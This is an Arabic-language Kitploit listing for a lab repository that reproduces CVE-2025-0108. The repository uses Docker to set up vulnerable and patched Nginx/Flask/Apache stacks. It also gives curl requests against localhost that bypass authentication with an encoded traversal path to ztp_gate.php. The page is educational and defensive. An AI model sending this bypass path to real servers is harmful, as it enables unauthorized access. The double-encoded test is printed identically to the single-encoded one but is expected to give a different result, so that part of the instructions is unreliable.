Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-0108 — يعيد إنتاج ثغرة الارتباك في المسار CVE-2025-0108 في مجموعات Nginx/Apache. يتضمن PoC ضعيفًا وتطبيقًا مصححًا يوضح التخفيف على جانب الخادم الخلفي ضد تجاوز المصادقة المشفر مرتين. | Kitploit
أدوات/GitHubGitHub/kso4more/cve-2025-0108
تحليل الثغرات الأمنيةاستغلال تطبيقات الويبالمصادقةسوء التكوينالتعلم والتعليممختبرات وتدريب عملي
GitHubkso4more/cve-2025-0108

CVE-2025-0108

يعيد إنتاج ثغرة الارتباك في المسار CVE-2025-0108 في مجموعات Nginx/Apache. يتضمن PoC ضعيفًا وتطبيقًا مصححًا يوضح التخفيف على جانب الخادم الخلفي ضد تجاوز المصادقة المشفر مرتين.

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-0108 — أمان الويب (PoC والإصلاح)

يحتوي هذا المستودع على بيئة مختبرية صغيرة لإعادة إنتاج وتخفيف مشكلة CVE-2025-0108 (التباس المسار / تهريب الرؤوس بين Nginx وApache).
الهدف من المهمة هو إظهار كيف يمكن للطلبات ذات الترميز المزدوج تجاوز المصادقة في طبقة متعددة (Nginx -> Flask backend -> Apache/PHP) وعرض إجراء تخفيف على جانب الخادم الخلفي.

هذه البيئة لأغراض تعليمية فقط.

المحتويات

  • CVE-2025-0108/ — تنفيذ ضعيف (PoC)
  • CVE-2025-0108_fix/ — تنفيذ مصحح (الخادم الخلفي يتحقق من المسار مفكوك الترميز)

PoC (ضعيف) — CVE-2025-0108

الغرض

محاكاة الإعداد الضعيف حيث يمكن لمسار مشفر مزدوجًا تجاوز المصادقة بسبب عدم تناسق فك الترميز بين الطبقات.

بدء البيئة

من المجلد CVE-2025-0108:

root@kitploit:~
cd CVE-2025-0108
docker compose up --build

الاختبارات

شغّل أوامر curl هذه من جهازك المضيف:

الاختبار 1 — مشفر مزدوجًا (المتوقع: HTTP 200)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

يستخدم هذا الطلب ترميزًا مزدوجًا (%252e%252e == %2e%2e == ..) ويظهر التجاوز في الإعداد الضعيف. من المفترض أن يعيد 200 OK.

الاختبار 2 — مشفر فرديًا (المتوقع: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

الاختبار 3 — مسار خام مع .. (المتوقع: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/../php/ztp_gate.php/PAN_help/x.css"

إيقاف البيئات:

root@kitploit:~
docker compose down

الإصدار المصحح — CVE-2025-0108_fix

يقوم الخادم الخلفي بإجراء فحص إضافي على المسار مفكوك الترميز قبل السماح بالوصول. يمنع هذا تجاوز المصادقة عند إرسال طلبات مشفرة مزدوجًا.

من المجلد CVE-2025-0108:

root@kitploit:~
cd CVE-2025-0108
docker compose up --build

الاختبارات

شغّل أوامر curl هذه من جهازك المضيف:

من المجلد CVE-2025-0108_fix:

root@kitploit:~
cd CVE-2025-0108_fix
docker compose up --build

الاختبار 1 — مشفر مزدوجًا (المتوقع: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

يكتشف الخادم الخلفي المصحح .. مفكوك الترميز ويعيد 401 غير مصرح.

الاختبار 2 — مشفر فرديًا (المتوقع: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

الاختبار 3 — مسار خام مع .. (المتوقع: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/../php/ztp_gate.php/PAN_help/x.css"

إيقاف البيئات:

root@kitploit:~
docker compose down
تنزيل الأداة